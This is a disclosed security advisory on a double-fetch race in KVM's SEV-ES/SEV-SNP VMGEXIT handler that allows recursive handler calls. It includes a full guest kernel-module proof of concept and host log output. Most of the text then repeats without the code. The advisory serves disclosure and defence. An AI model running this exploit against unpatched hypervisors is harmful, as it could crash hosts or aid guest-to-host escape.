Summary
A KVM guest using SEV-ES or SEV-SNP with multiple vCPUs can trigger a double fetch race condition vulnerability and invoke the VMGEXIT handler recursively. If an attacker manages to call the handler multiple times, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape in kernel configurations without stack guard pages (CONFIG_VMAP_STACK).
Severity
Moderate - could lead to a stack overflow and cause a denial-of-service or potentially guest-to-host escape.
Proof of Concept
The proof of concept enters the VMGEXIT
handler with SVM_EXIT_VMGEXIT
as exit-code, and then quickly swaps to SVM_EXIT_INVD
to pass the validation. This results in a recursive invocation of svm_invoke_exit_handler
with SVM_EXIT_VMGEXIT
as exit_code
.
#include <linux/delay.h>
#include <linux/kthread.h>
#include <linux/module.h>
#include <asm/msr-index.h>
#include <asm/sev.h>
#include <asm/svm.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andy Nguyen");
MODULE_DESCRIPTION("KVM SEV-ES VMGEXIT double fetch race condition");
MODULE_VERSION("1.0");
static inline u64 sev_es_rd_ghcb_msr(void) {
return __rdmsr(MSR_AMD64_SEV_ES_GHCB);
}
static __always_inline void vc_ghcb_invalidate(struct ghcb *ghcb) {
ghcb->save.sw_exit_code = 0;
__builtin_memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
}
static int race1_thread(void *ghcb) {
u64 ghcb_pa;
ghcb_pa = __pa(ghcb);
printk(KERN_EMERG "thread 1: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);
while (1) {
*(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_VMGEXIT;
*(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_INVD;
asm("pause\n");
}
return 0;
}
static int race0_thread(void *arg) {
struct task_struct *race1_task;
void *ghcb;
u64 ghcb_pa;
ghcb_pa = sev_es_rd_ghcb_msr();
ghcb = __va(ghcb_pa);
printk(KERN_EMERG "thread 0: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);
race1_task = kthread_create(race1_thread, ghcb, "race1");
kthread_bind(race1_task, 1);
wake_up_process(race1_task);
while (1) {
vc_ghcb_invalidate(ghcb);
ghcb_set_sw_exit_code(ghcb, SVM_EXIT_VMGEXIT);
ghcb_set_sw_exit_info_1(ghcb, 0);
ghcb_set_sw_exit_info_2(ghcb, 0);
VMGEXIT();
asm("pause\n");
}
return 0;
}
static int __init poc_init(void) {
struct task_struct *race0_task;
race0_task = kthread_create(race0_thread, NULL, "race0");
kthread_bind(race0_task, 0);
wake_up_process(race0_task);
return 0;
}
static void __exit poc_exit(void) {}
module_init(poc_init);
module_exit(poc_exit);
We modified the function sev_handle_vmgexit
and added the following print to alert when the race condition was successful:
default:
if (exit_code == SVM_EXIT_VMGEXIT)
pr_err("Race condition triggered!\n");
ret = svm_invoke_exit_handler(svm, exit_code);
Running this will result in something like the below:
[ 3332.177310] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x403 is not valid
[ 3332.307315] SVM: Race condition triggered!
[ 3332.311419] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x76 input is not valid
Further Analysis
If an attacker is able to trigger the recursion multiple times reliably on the same call stack, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape. Exploiting recursions on linux kernel has been proven feasible in 2016. However, today, there are mitigations such as CONFIG_VMAP_STACK that add guard pages to stacks.
Moreover, winning the race reliably in every iteration is very tricky due to the very tight window of the fetches; namely they are consecutive (because of optimization and inlining):
// Corresponds to [2] from code above.
d83: 49 8b 8e 90 03 00 00 mov rcx,QWORD PTR [r14+0x390]
// Corresponds to [3] from code above.
d8a: 4d 8b bc 24 90 03 00 mov r15,QWORD PTR [r12+0x390]
A kernel stack on x86-64 is 16384 bytes large. In our build, the function sev_handle_vmgexit allocates 64 bytes of stack and svm_invoke_exit_handler allocates 40 bytes of stack. Not taking into account the stack used until that point, we estimate that around ~100-150 successful races / iterations are needed to overflow.
For the currently work-in-progress KVM SEV-SNP code (not upstream yet), the code has been reorganized, and the race window might be a bit bigger and hence easier to win (see [5] and [6] from code above). Though, we have not yet compiled the code to confirm.
Timeline
Date reported: 05/08/2023
Date fixed: 08/04/2023
Date disclosed: 09/06/2023
Summary
A KVM guest using SEV-ES or SEV-SNP with multiple vCPUs can trigger a double fetch race condition vulnerability and invoke the VMGEXIT handler recursively. If an attacker manages to call the handler multiple times, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape in kernel configurations without stack guard pages (CONFIG_VMAP_STACK).
Severity
Moderate - could lead to a stack overflow and cause a denial-of-service or potentially guest-to-host escape.
Proof of Concept
The proof of concept enters the
VMGEXIT
handler withSVM_EXIT_VMGEXIT
as exit-code, and then quickly swaps toSVM_EXIT_INVD
to pass the validation. This results in a recursive invocation ofsvm_invoke_exit_handler
withSVM_EXIT_VMGEXIT
asexit_code
.We modified the function
sev_handle_vmgexit
and added the following print to alert when the race condition was successful:Running this will result in something like the below:
Further Analysis
If an attacker is able to trigger the recursion multiple times reliably on the same call stack, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape. Exploiting recursions on linux kernel has been proven feasible in 2016. However, today, there are mitigations such as CONFIG_VMAP_STACK that add guard pages to stacks.
Moreover, winning the race reliably in every iteration is very tricky due to the very tight window of the fetches; namely they are consecutive (because of optimization and inlining):
A kernel stack on x86-64 is 16384 bytes large. In our build, the function sev_handle_vmgexit allocates 64 bytes of stack and svm_invoke_exit_handler allocates 40 bytes of stack. Not taking into account the stack used until that point, we estimate that around ~100-150 successful races / iterations are needed to overflow.
For the currently work-in-progress KVM SEV-SNP code (not upstream yet), the code has been reorganized, and the race window might be a bit bigger and hence easier to win (see [5] and [6] from code above). Though, we have not yet compiled the code to confirm.
Timeline
Date reported: 05/08/2023
Date fixed: 08/04/2023
Date disclosed: 09/06/2023